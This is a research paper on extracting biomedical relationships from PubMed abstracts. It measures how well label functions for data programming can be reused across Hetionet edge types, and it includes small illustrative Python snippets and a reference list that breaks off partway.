Distant supervision is a technique also designed to sidestep the dependence on manual curation and quickly generate large training datasets. This technique assumes that positive examples established in selected databases can be applied to any sentence that contains them [4]. The central problem with this technique is that the generated labels are often of low quality, which results in a large number of false positives [10].
Ratner et al. [11] recently introduced “data programming” as a solution. Data programming is a paradigm that combines distant supervision with simple rules and heuristics written as small programs called label functions. These label functions are consolidated via a noise-aware generative model that is designed to produce training labels for large datasets. Using this paradigm can dramatically reduce the time required to obtain sufficient training data; however, writing a useful label function requires a significant amount of time and error analysis. This dependency makes constructing a knowledge base with a myriad of heterogeneous relationships nearly impossible, as tens or possibly hundreds of label functions are required per relationship type.
In this paper, we seek to accelerate the label function creation process by measuring the extent to which label functions can be re-used across different relationship types. We hypothesize that sentences describing one relationship type may share linguistic features such as keywords or sentence structure with sentences describing other relationship types. We conducted a series of experiments to determine the degree to which label function re-use enhanced performance over distant supervision alone. We focus on relationships that indicate similar types of physical interactions (i.e., gene-binds-gene and compound-binds-gene) as well as different types (i.e., disease-associates-gene and compound-treats-disease). Re-using label functions could dramatically reduce the time required to populate a knowledge base with a multitude of heterogeneous relationships.
Relationship extraction is the process of detecting semantic relationships from a collection of text. This process can be broken down into three different categories: (1) the use of natural language processing techniques such as manually crafted rules and heuristics for relationship extraction (Rule Based Extractors), (2) the use of unsupervised methods such as co-occurrence scores or clustering to find patterns within sentences and documents (Unsupervised Extractors), and (3) the use of supervised or semi-supervised machine learning for classifying the presence of a relation within documents or sentences (Supervised Extractors). In this section, we briefly discuss selected efforts under each category.
#### Rule Based Extractors
Rule based extractors rely heavily on expert knowledge to perform extraction. Typically, these systems use linguistic rules and heuristics to identify key sentences or phrases. For example, a hypothetical extractor focused on protein phosphorylation events would identify sentences containing the phrase “gene X phosphorylates gene Y” [12]. This phrase is a straightforward indication that two genes have a fundamental role in protein phosphorylation. Other phrase extractors have been used to identify drug-disease treatments [13], pharmacogenomic events [14] and protein-protein interactions [15,16]. These extractors provide a simple and effective way to extract sentences; however, they depend on extensive knowledge about the text to be properly constructed.
A sentence’s grammatical structure can also support relationship extraction via dependency trees. Dependency trees are data structures that depict a sentence’s grammatical relation structure in the form of nodes and edges. Nodes represent words and edges represent the dependency type each word shares with another. For example, a possible extractor would classify a sentence as positive if it contained the following dependency tree path: “gene X (subject) -> promotes (verb) <- cell death (direct object) <- in (preposition) <- tumors (object of preposition)” [17]. This approach provides extremely precise results, but the quantity of positive results remains modest, as sentences appear in distinct forms and structures. Because of this limitation, recent approaches have incorporated methods on top of rule based extractors, such as co-occurrence and machine learning systems [18,19]. We discuss the pros and cons of these added methods in a later section. For this project, we constructed our label functions without the aid of these works; however, the approaches discussed in this section provide substantial inspiration for novel label functions in future endeavors.
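A toy phrase-based extractor in the spirit of the phosphorylation example above (a hypothetical pattern; a real system would match against the output of a named-entity tagger rather than a crude regex):

```python
import re

# The GENE pattern is a crude stand-in for named-entity-tagged gene mentions.
GENE = r"[A-Za-z][A-Za-z0-9-]*"
PATTERN = re.compile(rf"({GENE})\s+phosphorylates\s+({GENE})", re.IGNORECASE)

def extract_phosphorylation(sentence: str):
    match = PATTERN.search(sentence)
    return (match.group(1), match.group(2)) if match else None

print(extract_phosphorylation("AKT1 phosphorylates FOXO3 in response to insulin."))
# ('AKT1', 'FOXO3')
```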
#### Unsupervised Extractors
Unsupervised extractors detect relationships without the need for annotated text. Notable approaches exploit the fact that two entities can occur together in text. This event is referred to as co-occurrence. Extractors utilize these events by generating statistics on the frequency with which entity pairs occur in text. For example, a possible extractor would say gene X is associated with disease Y, because gene X and disease Y appear together more often than would be expected by chance [20]. This approach has been used to establish the following relationship types: disease-gene relationships [20,21,22,23,24,25], protein-protein interactions [24,26,27], drug-disease treatments [28], and tissue-gene relations [29]. Extractors using the co-occurrence strategy provide exceptional recall results; however, these methods may fail to detect underreported relationships, because they depend on entity-pair frequency for detection. Junge et al. created a hybrid approach to account for this issue, using distant supervision to train a classifier to learn the context of each sentence [30]. Once the classifier was trained, they scored every sentence within their corpus, and each sentence’s score was incorporated into calculating co-occurrence frequencies to establish relationship existence [30]. Co-occurrence approaches are powerful in establishing edges on the global scale; however, they cannot identify individual sentences without supervised methods.
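A toy version of such a co-occurrence score, assuming sentences have already been reduced to sets of entity mentions (the statistic and names are illustrative, not those of the cited systems): compare the observed number of co-mentions of a pair with the count expected if the two entities appeared independently.

```python
# Ratio of observed co-mentions to the count expected under independence.
def cooccurrence_ratio(tagged_sentences, gene, disease):
    n = len(tagged_sentences)
    n_gene = sum(gene in s for s in tagged_sentences)
    n_disease = sum(disease in s for s in tagged_sentences)
    n_both = sum(gene in s and disease in s for s in tagged_sentences)
    expected = n_gene * n_disease / n  # expected co-mentions if independent
    return n_both / expected if expected else 0.0

sentences = [
    {"BRCA1", "breast cancer"},
    {"BRCA1", "breast cancer"},
    {"TP53"},
    {"EGFR"},
]
print(cooccurrence_ratio(sentences, "BRCA1", "breast cancer"))  # 2.0
```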
Clustering is an unsupervised approach that extracts relationships from text by grouping similar sentences together. Percha et al. used this technique to group sentences based on their grammatical structure [31]. Using Stanford’s Core NLP Parser [32], a dependency tree was generated for every sentence in each Pubmed abstract [31]. Each tree was clustered based on similarity and each cluster was manually annotated to determine which relationship each group represented [31]. For our project we incorporated the results of this work as domain heuristic label functions. Overall, unsupervised approaches are desirable since they do not require well-annotated training data. Such approaches provide excellent recall; however, performance can be limited in terms of precision when compared to supervised machine learning methods [33,34].
#### Supervised Extractors
Supervised extractors consist of training a machine learning classifier to predict the existence of a relationship within text. These classifiers require access to well-annotated datasets, which are usually created via some form of manual curation. Previous work consists of research experts curating their own datasets to train classifiers [35,36,37,38,39]; however, there have been community-wide efforts to create datasets for shared tasks [40,41,42]. Shared tasks are open challenges that aim to build the best classifier for natural language processing tasks such as named entity tagging or relationship extraction. A notable example is the BioCreative community, which hosted a number of shared tasks such as predicting compound-protein interactions (BioCreative VI track 5) [41] and compound-induced diseases [42]. Often these datasets are well annotated but modest in size (2,432 abstracts for BioCreative VI [41] and 1,500 abstracts for BioCreative V [42]). As machine learning classifiers become increasingly complex, such small datasets cannot suffice. Moreover, these datasets are each annotated differently, which can produce noticeable differences in classifier performance [42]. Overall, obtaining large well-annotated datasets remains an open, non-trivial task.
Before the rise of deep learning, the most frequently used classifier was the support vector machine. This classifier uses a projection function called a kernel to map data onto a high-dimensional space so that datapoints can be easily discerned between classes [43]. This method was used to extract disease-gene associations [35,44,45], protein-protein interactions [19,46,47] and protein docking information [48]. Generally, support vector machines perform well on small datasets with large feature spaces, but are slow to train as the number of datapoints becomes asymptotically large.
Deep learning has become increasingly popular, as these methods can outperform common machine learning methods [49]. Approaches in this field consist of using various neural network architectures, such as recurrent neural networks [50,51,52,53,54,55] and convolutional neural networks [51,54,56,57,58], to extract relationships from text. In fact, an approach from this field was the winning model in the BioCreative VI shared task [41,59]. Despite the substantial success of these models, they often require large amounts of data to perform well. Obtaining large datasets is a time-consuming task, which makes training these models a non-trivial challenge. Distant supervision has been used as a solution to the scarcity of large datasets [4]. Approaches have used this paradigm to extract chemical-gene interactions [54], disease-gene associations [30] and protein-protein interactions [30,54,60]. In fact, the work in [60] served as one of the motivating rationales for our work.
Overall, deep learning has provided exceptional results in terms of relationships extraction. Thus, we decided to use a deep neural network as our discriminative model.
## Methods and Materials
### Hetionet
Hetionet v1 [3] is a large heterogeneous network that contains pharmacological and biological information. This network depicts information in the form of nodes and edges of different types: nodes represent biological and pharmacological entities and edges represent relationships between entities. Hetionet v1 contains 47,031 nodes with 11 different data types and 2,250,197 edges that represent 24 different relationship types (Figure 1). Edges in Hetionet v1 were obtained from open databases, such as the GWAS Catalog [61] and DrugBank [62]. For this project, we analyzed performance over a subset of the Hetionet v1 edge types: disease associates with a gene (DaG), compound binds to a gene (CbG), compound treating a disease (CtD) and gene interacts with gene (GiG) (bolded in Figure 1).
### Dataset
We used PubTator [63] as input to our analysis. PubTator provides MEDLINE abstracts that have been annotated with well-established entity recognition tools including DNorm [64] for disease mentions, GeneTUKit [65] for gene mentions, Gnorm [66] for gene normalizations and a dictionary-based search system for compound mentions [67]. We downloaded PubTator on June 30, 2017, at which point it contained 10,775,748 abstracts. Then we filtered out mention tags that were not contained in Hetionet v1. We used the Stanford CoreNLP parser [32] to tag parts of speech and generate dependency trees. We extracted sentences with two or more mentions, termed candidate sentences. Each candidate sentence was stratified by co-mention pair to produce a training set, a tuning set and a testing set (shown in Supplemental Table 2). Each unique co-mention pair was sorted into four categories: (1) in Hetionet v1 and has sentences, (2) in Hetionet v1 and doesn’t have sentences, (3) not in Hetionet v1 and does have sentences, and (4) not in Hetionet v1 and doesn’t have sentences. Within these four categories, each pair is randomly assigned its own individual partition rank (a continuous number between 0 and 1). Any rank lower than 0.7 is sorted into the training set, while any rank greater than or equal to 0.7 and lower than 0.9 is assigned to the tuning set. The remaining pairs, with a rank greater than or equal to 0.9, are assigned to the test set. Sentences that contain more than one co-mention pair are treated as multiple individual candidates. We hand-labeled five hundred to a thousand candidate sentences of each edge type to obtain a ground truth set (Supplemental Table 2).
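A minimal sketch of the partition-rank assignment described above (illustrative code, not the authors' pipeline):

```python
import random

# Each unique co-mention pair receives a uniform partition rank,
# which determines its split: < 0.7 train, [0.7, 0.9) tune, >= 0.9 test.
rng = random.Random(0)

def assign_split(rank: float) -> str:
    if rank < 0.7:
        return "train"
    if rank < 0.9:
        return "tune"
    return "test"

pairs = [("BRCA1", "breast cancer"), ("TP53", "lung cancer")]
splits = {pair: assign_split(rng.random()) for pair in pairs}
print(splits)
```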
### Label Functions for Annotating Sentences
The challenge of having too few ground truth annotations is common to many natural language processing settings, even when unannotated text is abundant. Data programming circumvents this issue by quickly annotating large datasets using multiple noisy signals emitted by label functions [11]. Label functions are simple Python functions that emit a positive label (1), a negative label (-1) or abstain from emitting a label (0). These functions can be grouped into multiple categories (see Supplemental Methods). We combined these functions using a generative model to output a single annotation, which is a consensus probability score bounded between 0 (low chance of mentioning a relationship) and 1 (high chance of mentioning a relationship). We used these annotations to train a discriminative model that makes the final classification step.
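To build intuition for how noisy label-function signals are combined, the sketch below arranges label-function outputs into a matrix and computes a naive majority-vote consensus. This is only an illustrative stand-in for the generative model described above, which additionally learns per-function accuracies; all names are ours:

```python
import numpy as np

# Toy label matrix: rows are candidate sentences, columns are label
# functions; entries are 1 (positive), -1 (negative) or 0 (abstain).
L = np.array([
    [ 1,  0,  1],
    [-1, -1,  0],
    [ 0,  0,  0],
])

def majority_vote(L):
    """Fraction of positive votes among non-abstaining label functions;
    falls back to 0.5 when every function abstains."""
    votes = (L != 0).sum(axis=1)
    positives = (L == 1).sum(axis=1)
    return np.where(votes > 0, positives / np.maximum(votes, 1), 0.5)

print(majority_vote(L))  # [1.0, 0.0, 0.5]
```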
### Experimental Design
Being able to re-use label functions across edge types would substantially reduce the number of label functions required to extract multiple relationships from biomedical literature. We first established a baseline by training a generative model using only distant supervision label functions designed for the target edge type (see Supplemental Methods). For example, for the Gene interacts Gene (GiG) edge type we used label functions that returned a 1 if the pair of genes was included in the Human Interaction database [68], the iRefIndex database [69] or the Incomplete Interactome database [70]. Then we compared the baseline model with models that also included text and domain-heuristic label functions. Using sampling with replacement, we sampled these text and domain-heuristic label functions separately within edge types, across edge types, and from a pool of all label functions. We compared within-edge-type performance to across-edge-type and all-edge-type performance. For each edge type we sampled label functions at five evenly spaced sample sizes between one and the total number of available label functions, and we repeated each sampling 50 times. Furthermore, at each sample size we also trained the discriminative model using annotations from the generative model trained on edge-specific label functions (see Supplemental Methods). We report the performance of both models in terms of the area under the receiver operating characteristic curve (AUROC) and the area under the precision-recall curve (AUPR). Following model evaluation, we quantified the number of edges we could incorporate into Hetionet v1. Using a calibrated discriminative model (see Supplemental Methods), we scored every candidate sentence within our dataset and grouped candidates by their mention pair. We took the maximum score within each candidate group as the probability of the existence of an edge. We established edges by using a cutoff score that produced an equal error rate between the false positives and false negatives. We report the number of preexisting edges we could recall as well as the number of novel edges we could incorporate. Lastly, we compared our framework with a previously established unsupervised approach [30].
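The sampling design can be summarized by a short sketch. This is a hypothetical reconstruction; the function names, the seed and the use of NumPy are our assumptions:

```python
import numpy as np

rng = np.random.default_rng(0)  # seed is illustrative

def sample_sizes(total):
    """Five evenly spaced sample sizes between one and the total
    number of text/domain-heuristic label functions."""
    return np.unique(np.linspace(1, total, num=5).astype(int))

def sampling_experiment(label_fns, n_repeats=50):
    """Sample label functions with replacement at each size, 50 times
    per size; each sample augments the baseline generative model."""
    for size in sample_sizes(len(label_fns)):
        for _ in range(n_repeats):
            idx = rng.choice(len(label_fns), size=size, replace=True)
            yield size, [label_fns[i] for i in idx]
```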
## Results
### Generative Model Using Randomly Sampled Label Functions
Creating label functions is a labor-intensive process that can take days to accomplish. We sought to accelerate this process by measuring the extent to which label functions can be reused. Our hypothesis was that certain edge types share linguistic features such as keywords and/or sentence structure, which would make them amenable to label function reuse. We designed a set of experiments to test this hypothesis on an individual level (edge vs. edge) as well as a global level (collective pool of sources). We observed that performance increased when edge-specific label functions were added to an edge-specific baseline model, while label function reuse usually provided less benefit (AUROC Figure 2, AUPR Supplemental Figure 5). We also evaluated randomly selecting label functions from among all sets and observed similar performance (AUROC Supplemental Figure 6, AUPR Supplemental Figure 7). The quintessential example of this overarching trend is the Compound treats Disease (CtD) edge type, where edge-specific label functions always outperformed transferred label functions. However, there are hints of label function transferability for selected edge types and label function sources. Performance increases as more CbG label functions are incorporated into the GiG baseline model and vice versa, which suggests that GiG and CbG sentences may share linguistic features or terminology that allows label functions to be reused. Perplexingly, edge-specific Disease associates Gene (DaG) label functions did not improve performance over label functions drawn from other edge types. Overall, only CbG and GiG showed significant signs of reusability, which suggests label functions could be shared between these two edge types.
We found that sampling from all label function sources at once usually underperformed relative to edge-specific label functions (Supplemental Figures 6 and 7). As more label functions were sampled, the gap between edge-specific sources and all sources widened. CbG is a prime example of this trend (Supplemental Figures 6 and 7), while CtD and GiG show a similar but milder trend. DaG was the exception to the general rule: the pooled set of label functions improved performance over the edge-specific ones, which aligns with the previously observed results for individual edge types (Figure 2). The decreasing trend when pooling all label functions supports the notion that label functions cannot easily transfer between edge types (the exception being CbG on GiG and vice versa).
### Discriminative Model Performance
The discriminative model is designed to augment performance over the generative model by incorporating textual features along with the estimated training labels. The discriminative model is a piecewise convolutional neural network trained over word embeddings (see Methods and Materials). We found that the discriminative model generally outperformed the generative model as more edge-specific label functions were incorporated (Figure 3 and Supplemental Figure 8). The discriminative model’s performance is often poorest when very few edge-specific label functions are added to the baseline model (seen in Disease associates Gene (DaG), Compound binds Gene (CbG) and Gene interacts Gene (GiG)). This suggests that generative models trained with more label functions produce outputs that are more suitable for training discriminative models. An exception to this trend is Compound treats Disease (CtD), where the discriminative model outperforms the generative model at all levels of sampling. We observed the opposite trend with the Compound binds Gene (CbG) edges: the discriminative model was always poorer than or indistinguishable from the generative model. Interestingly, the AUPR for CbG plateaus below the generative model and decreases when all edge-specific label functions are used (Supplemental Figure 8), which suggests that the discriminative model might be predicting more false positives in this setting. Overall, incorporating more edge-specific label functions usually improves the performance of the discriminative model over the generative model.
## Discussion
We measured the extent to which label functions can be re-used across multiple edge types to extract relationships from literature. Through our sampling experiment, we found that adding edge-specific label functions increases performance for the generative model (Figure 2). We found that label functions designed for closely related edge types can increase performance (Gene interacts Gene (GiG) label functions predicting the Compound binds Gene (CbG) edge and vice versa), while the Disease associates Gene (DaG) edge type remained agnostic to label function sources (Figure 2 and Supplemental Figure 5). Furthermore, we found that using all label functions at once generally hurts performance, with the exception being the DaG edge type (Supplemental Figures 6 and 7). One possible explanation for this observation is that DaG is a broadly defined edge type. For example, DaG may contain many concepts related to other edge types, such as a disease (up/down) regulating a gene, which would make it more agnostic to label function sources (examples highlighted in our annotated sentences).
Regarding the discriminative model, adding edge-specific label functions substantially improved performance for two out of the four edge types (Compound treats Disease (CtD) and Disease associates Gene (DaG)) (Figure 3 and Supplemental Figure 8). The Gene interacts Gene (GiG) and Compound binds Gene (CbG) discriminative models showed minor improvements compared to the generative model, but only when nearly all edge-specific label functions were included (Figure 3 and Supplemental Figure 8). We came across a large number of spurious gene mentions when working with the discriminative model and believe that these mentions contributed to the hindered performance of CbG and GiG. We also encountered difficulty in calibrating each discriminative model (Supplemental Figure 9). The temperature scaling algorithm appears to improve calibration for the highest scores of each model but did not successfully calibrate across the entire range of predictions. Improving calibration for all predictions may require more labeled examples or may be a limitation of the approach in this setting. Even with these limitations, this early-stage approach could recall many existing edges from an existing knowledge base, Hetionet v1, and suggest many new high-confidence edges for inclusion (Supplemental Figure 10). Our findings suggest that further work, including an expansion of edge types and a move from abstracts to full text, may make this approach suitable for building continuously updated knowledge bases to address drug repositioning and other biomedical challenges.
## Conclusion and Future Direction
Populating knowledge bases via manual curation can be an arduous and error-prone task [8]. As the rate of publications increases, relying on manual curation alone becomes impractical. Data programming, a paradigm that uses label functions to speed up the annotation process, can be used to address this problem. An obstacle for this paradigm, however, is creating useful label functions, which takes a considerable amount of time. We tested the feasibility of reusing label functions as a way to reduce the total number of label functions required for strong prediction performance. We conclude that label functions may be re-used with closely related edge types, but that re-use does not improve performance for most pairings. The discriminative model’s performance improves as more edge-specific label functions are incorporated into the generative model; however, we noticed that its performance depends heavily on the annotations provided by the generative model.
This work lays the foundation for creating a common framework that mines text to create edges. Within this framework we would continuously incorporate new knowledge as novel findings are published, while providing a single confidence score for an edge via sentence score consolidation. As opposed to many existing knowledge graphs (for example, Hetionet v1, where text-derived edges generally cannot be exactly attributed to excerpts from literature [3,71]), our approach has the potential to annotate each edge based on its source sentences. In addition, edges generated with this approach would be unencumbered by upstream licensing or copyright restrictions, enabling openly licensed hetnets at a scale not previously possible [72,73,74]. New multitask learning [75] strategies may make it even more practical to reuse label functions to construct continuously updating literature-derived knowledge graphs.
## Supplemental Information
An online version of this manuscript is available at https://greenelab.github.io/text_mined_hetnet_manuscript/. Source code for this work is available under open licenses at: https://github.com/greenelab/snorkeling/.
## Acknowledgements
The authors would like to thank Christopher Ré’s group at Stanford University, especially Alex Ratner and Stephen Bach, for their assistance with this project. We also want to thank Graciela Gonzalez-Hernandez for her advice and input on this project. This work was supported by Grant GBMF4552 from the Gordon and Betty Moore Foundation.
## References
1. Graph Theory Enables Drug Repurposing – How a Mathematical Model Can Drive the Discovery of Hidden Mechanisms of Action
Ruggero Gramatica, T. Di Matteo, Stefano Giorgetti, Massimo Barbiani, Dorian Bevec, Tomaso Aste
PLoS ONE (2014-01-09) https://doi.org/gf45zp
DOI: 10.1371/journal.pone.0084912 · PMID: 24416311 · PMCID: PMC3886994
2. Drug repurposing through joint learning on knowledge graphs and literature
Mona Alshahrani, Robert Hoehndorf
Cold Spring Harbor Laboratory (2018-08-06) https://doi.org/gf45zk
DOI: 10.1101/385617
3. Systematic integration of biomedical knowledge prioritizes drugs for repurposing
Daniel Scott Himmelstein, Antoine Lizee, Christine Hessler, Leo Brueggeman, Sabrina L Chen, Dexter Hadley, Ari Green, Pouya Khankhanian, Sergio E Baranzini
eLife (2017-09-22) https://doi.org/cdfk
DOI: 10.7554/elife.26726 · PMID: 28936969 · PMCID: PMC5640425
4. Distant supervision for relation extraction without labeled data
Mike Mintz, Steven Bills, Rion Snow, Dan Jurafsky
Proceedings of the Joint Conference of the 47th Annual Meeting of the ACL and the 4th International Joint Conference on Natural Language Processing of the AFNLP: Volume 2 - ACL-IJCNLP ’09 (2009) https://doi.org/fg9q43
DOI: 10.3115/1690219.1690287
5. CoCoScore: Context-aware co-occurrence scoring for text mining applications using distant supervision
Alexander Junge, Lars Juhl Jensen
Cold Spring Harbor Laboratory (2018-10-16) https://doi.org/gf45zm
DOI: 10.1101/444398
6. Knowledge-guided convolutional networks for chemical-disease relation extraction
Huiwei Zhou, Chengkun Lang, Zhuang Liu, Shixian Ning, Yingyu Lin, Lei Du
BMC Bioinformatics (2019-05-21) https://doi.org/gf45zn
DOI: 10.1186/s12859-019-2873-7 · PMID: 31113357 · PMCID: PMC6528333
7. Facts from text: can text mining help to scale-up high-quality manual curation of gene products with ontologies?
R. Winnenburg, T. Wachter, C. Plake, A. Doms, M. Schroeder
Briefings in Bioinformatics (2008-07-11) https://doi.org/bfsnwg
DOI: 10.1093/bib/bbn043 · PMID: 19060303
8. Manual curation is not sufficient for annotation of genomic databases
William A. Baumgartner Jr, K. Bretonnel Cohen, Lynne M. Fox, George Acquaah-Mensah, Lawrence Hunter
Bioinformatics (2007-07-01) https://doi.org/dtck86
DOI: 10.1093/bioinformatics/btm229 · PMID: 17646325 · PMCID: PMC2516305
9. Growth rates of modern science: A bibliometric analysis based on the number of publications and cited references
Lutz Bornmann, Rüdiger Mutz
Journal of the Association for Information Science and Technology (2015-04-29) https://doi.org/gfj5zc
DOI: 10.1002/asi.23329
10. Revisiting distant supervision for relation extraction
Tingsong Jiang, Jing Liu, Chin-Yew Lin, Zhifang Sui
LREC (2018)
11. Data Programming: Creating Large Training Sets, Quickly
Alexander Ratner, Christopher De Sa, Sen Wu, Daniel Selsam, Christopher Ré
arXiv (2016-05-25) https://arxiv.org/abs/1605.07723v3
12. RLIMS-P 2.0: A Generalizable Rule-Based Information Extraction System for Literature Mining of Protein Phosphorylation Information
Manabu Torii, Cecilia N. Arighi, Gang Li, Qinghua Wang, Cathy H. Wu, K. Vijay-Shanker
IEEE/ACM Transactions on Computational Biology and Bioinformatics (2015-01-01) https://doi.org/gf8fpv
DOI: 10.1109/tcbb.2014.2372765 · PMID: 26357075 · PMCID: PMC4568560
13. Large-scale extraction of accurate drug-disease treatment pairs from biomedical literature for drug repurposing
Rong Xu, QuanQiu Wang
BMC Bioinformatics (2013-06-06) https://doi.org/gb8v3k
DOI: 10.1186/1471-2105-14-181 · PMID: 23742147 · PMCID: PMC3702428
14. Pharmspresso: a text mining tool for extraction of pharmacogenomic concepts and relationships from full text
Yael Garten, Russ B Altman
BMC Bioinformatics (2009-02) https://doi.org/df75hq
DOI: 10.1186/1471-2105-10-s2-s6 · PMID: 19208194 · PMCID: PMC2646239
15. PPInterFinder—a mining tool for extracting causal relations on human proteins from literature
Kalpana Raja, Suresh Subramani, Jeyakumar Natarajan
Database (2013-01-01) https://doi.org/gf479b
DOI: 10.1093/database/bas052 · PMID: 23325628 · PMCID: PMC3548331
16. HPIminer: A text mining system for building and visualizing human protein interaction networks and pathways
Suresh Subramani, Raja Kalpana, Pankaj Moses Monickaraj, Jeyakumar Natarajan
Journal of Biomedical Informatics (2015-04) https://doi.org/f7bgnr
DOI: 10.1016/j.jbi.2015.01.006 · PMID: 25659452
17. PKDE4J: Entity and relation extraction for public knowledge discovery.
Min Song, Won Chul Kim, Dahee Lee, Go Eun Heo, Keun Young Kang
Journal of biomedical informatics (2015-08-12) https://www.ncbi.nlm.nih.gov/pubmed/26277115
DOI: 10.1016/j.jbi.2015.08.008 · PMID: 26277115
18. Textpresso Central: a customizable platform for searching, text mining, viewing, and curating biomedical literature
H.-M. Müller, K. M. Van Auken, Y. Li, P. W. Sternberg
BMC Bioinformatics (2018-03-09) https://doi.org/gf7rbz
DOI: 10.1186/s12859-018-2103-8 · PMID: 29523070 · PMCID: PMC5845379
19. LimTox: a web tool for applied text mining of adverse event and toxicity associations of compounds, drugs and genes
Andres Cañada, Salvador Capella-Gutierrez, Obdulia Rabal, Julen Oyarzabal, Alfonso Valencia, Martin Krallinger
Nucleic Acids Research (2017-05-22) https://doi.org/gf479h
DOI: 10.1093/nar/gkx462 · PMID: 28531339 · PMCID: PMC5570141
20. DISEASES: Text mining and data integration of disease–gene associations
Sune Pletscher-Frankild, Albert Pallejà, Kalliopi Tsafou, Janos X. Binder, Lars Juhl Jensen
Methods (2015-03) https://doi.org/f3mn6s
DOI: 10.1016/j.ymeth.2014.11.020 · PMID: 25484339
21. PolySearch2: a significantly improved text-mining system for discovering associations between human diseases, genes, drugs, metabolites, toxins and more
Yifeng Liu, Yongjie Liang, David Wishart
Nucleic Acids Research (2015-04-29) https://doi.org/f7nzn5
DOI: 10.1093/nar/gkv383 · PMID: 25925572 · PMCID: PMC4489268
22. The research on gene-disease association based on text-mining of PubMed
Jie Zhou, Bo-quan Fu
BMC Bioinformatics (2018-02-07) https://doi.org/gf479k
DOI: 10.1186/s12859-018-2048-y · PMID: 29415654 · PMCID: PMC5804013
23. LGscore: A method to identify disease-related genes using biological literature and Google data
Jeongwoo Kim, Hyunjin Kim, Youngmi Yoon, Sanghyun Park
Journal of Biomedical Informatics (2015-04) https://doi.org/f7bj9c
DOI: 10.1016/j.jbi.2015.01.003 · PMID: 25617670
24. A comprehensive and quantitative comparison of text-mining in 15 million full-text articles versus their corresponding abstracts
David Westergaard, Hans-Henrik Stærfeldt, Christian Tønsberg, Lars Juhl Jensen, Søren Brunak
PLOS Computational Biology (2018-02-15) https://doi.org/gcx747
DOI: 10.1371/journal.pcbi.1005962 · PMID: 29447159 · PMCID: PMC5831415
25. Literature Mining for the Discovery of Hidden Connections between Drugs, Genes and Diseases
Raoul Frijters, Marianne van Vugt, Ruben Smeets, René van Schaik, Jacob de Vlieg, Wynand Alkema
PLoS Computational Biology (2010-09-23) https://doi.org/bhrw7x
DOI: 10.1371/journal.pcbi.1000943 · PMID: 20885778 · PMCID: PMC2944780
26. Analyzing a co-occurrence gene-interaction network to identify disease-gene association
Amira Al-Aamri, Kamal Taha, Yousof Al-Hammadi, Maher Maalouf, Dirar Homouz
BMC Bioinformatics (2019-02-08) https://doi.org/gf49nm
DOI: 10.1186/s12859-019-2634-7 · PMID: 30736752 · PMCID: PMC6368766
27. COMPARTMENTS: unification and visualization of protein subcellular localization evidence
J. X. Binder, S. Pletscher-Frankild, K. Tsafou, C. Stolte, S. I. O’Donoghue, R. Schneider, L. J. Jensen
Database (2014-02-25) https://doi.org/btbm
DOI: 10.1093/database/bau012 · PMID: 24573882 · PMCID: PMC3935310
28. A new method for prioritizing drug repositioning candidates extracted by literature-based discovery
2015 IEEE International Conference on Bioinformatics and Biomedicine (BIBM) (2015-11) https://doi.org/gf479j
DOI: 10.1109/bibm.2015.7359766
29. Comprehensive comparison of large-scale tissue expression datasets
Alberto Santos, Kalliopi Tsafou, Christian Stolte, Sune Pletscher-Frankild, Seán I. O’Donoghue, Lars Juhl Jensen
PeerJ (2015-06-30) https://doi.org/f3mn6p
DOI: 10.7717/peerj.1054 · PMID: 26157623 · PMCID: PMC4493645
30. CoCoScore: context-aware co-occurrence scoring for text mining applications using distant supervision
Alexander Junge, Lars Juhl Jensen
Bioinformatics (2019-06-14) https://doi.org/gf4789
DOI: 10.1093/bioinformatics/btz490 · PMID: 31199464
31. A global network of biomedical relationships derived from text
Bethany Percha, Russ B Altman
Bioinformatics (2018-02-27) https://doi.org/gc3ndk
DOI: 10.1093/bioinformatics/bty114 · PMID: 29490008 · PMCID: PMC6061699
32. The Stanford CoreNLP Natural Language Processing Toolkit
Christopher Manning, Mihai Surdeanu, John Bauer, Jenny Finkel, Steven Bethard, David McClosky
Proceedings of 52nd Annual Meeting of the Association for Computational Linguistics: System Demonstrations (2014) https://doi.org/gf3xhp
DOI: 10.3115/v1/p14-5010
33. Literature mining for the biologist: from information retrieval to biological discovery
Lars Juhl Jensen, Jasmin Saric, Peer Bork
Nature Reviews Genetics (2006-02) https://doi.org/bgq7q9
DOI: 10.1038/nrg1768 · PMID: 16418747
34. Application of text mining in the biomedical domain
Wilco W. M. Fleuren, Wynand Alkema
Methods (2015-03) https://doi.org/f64p6n
DOI: 10.1016/j.ymeth.2015.01.015 · PMID: 25641519
35. Extraction of relations between genes and diseases from text and large-scale data analysis: implications for translational research
Àlex Bravo, Janet Piñero, Núria Queralt-Rosinach, Michael Rautschka, Laura I Furlong
BMC Bioinformatics (2015-02-21) https://doi.org/f7kn8s
DOI: 10.1186/s12859-015-0472-9 · PMID: 25886734 · PMCID: PMC4466840
36. The EU-ADR corpus: Annotated drugs, diseases, targets, and their relationships
Erik M. van Mulligen, Annie Fourrier-Reglat, David Gurwitz, Mariam Molokhia, Ainhoa Nieto, Gianluca Trifiro, Jan A. Kors, Laura I. Furlong
Journal of Biomedical Informatics (2012-10) https://doi.org/f36vn6
DOI: 10.1016/j.jbi.2012.04.004 · PMID: 22554700
37. Comparative experiments on learning information extractors for proteins and their interactions
Razvan Bunescu, Ruifang Ge, Rohit J. Kate, Edward M. Marcotte, Raymond J. Mooney, Arun K. Ramani, Yuk Wah Wong
Artificial Intelligence in Medicine (2005-02) https://doi.org/dhztpn
DOI: 10.1016/j.artmed.2004.07.016 · PMID: 15811782
38. BioInfer: a corpus for information extraction in the biomedical domain
Sampo Pyysalo, Filip Ginter, Juho Heimonen, Jari Björne, Jorma Boberg, Jouni Järvinen, Tapio Salakoski
BMC Bioinformatics (2007-02-09) https://doi.org/b7bhhc
DOI: 10.1186/1471-2105-8-50 · PMID: 17291334 · PMCID: PMC1808065
39. RelEx–Relation extraction using dependency parse trees
K. Fundel, R. Kuffner, R. Zimmer
Bioinformatics (2006-12-01) https://doi.org/cz7q4d
DOI: 10.1093/bioinformatics/btl616 · PMID: 17142812
40. BioCreative V CDR task corpus: a resource for chemical disease relation extraction
Jiao Li, Yueping Sun, Robin J. Johnson, Daniela Sciaky, Chih-Hsuan Wei, Robert Leaman, Allan Peter Davis, Carolyn J. Mattingly, Thomas C. Wiegers, Zhiyong Lu
Database (2016) https://doi.org/gf5hfw
DOI: 10.1093/database/baw068 · PMID: 27161011 · PMCID: PMC4860626
41. Overview of the BioCreative VI chemical-protein interaction track
Martin Krallinger, Obdulia Rabal, Saber A Akhondi, et al.
Proceedings of the sixth biocreative challenge evaluation workshop (2017) https://www.semanticscholar.org/paper/Overview-of-the-BioCreative-VI-chemical-protein-Krallinger-Rabal/eed781f498b563df5a9e8a241c67d63dd1d92ad5
